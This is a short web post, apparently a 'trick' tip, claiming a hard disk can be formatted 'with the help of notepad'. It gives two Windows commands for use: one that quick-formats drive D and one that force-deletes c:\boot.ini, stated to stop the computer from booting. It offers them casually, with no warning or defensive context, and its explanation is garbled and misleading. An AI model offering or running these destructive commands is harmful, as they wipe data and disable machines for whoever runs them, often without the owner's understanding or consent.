Now it is easy to format your hard disk with the help of notepad. You don’t need to go anywhere format the  hard disk, just follow the simple step and hard disk will be format. You have to write only following coding to format the hard disk.

format d:\ /Q/X -- this will format your dirve d:\

del /F/S/Q c:\boot.ini -- this will cause your computer not to boot.
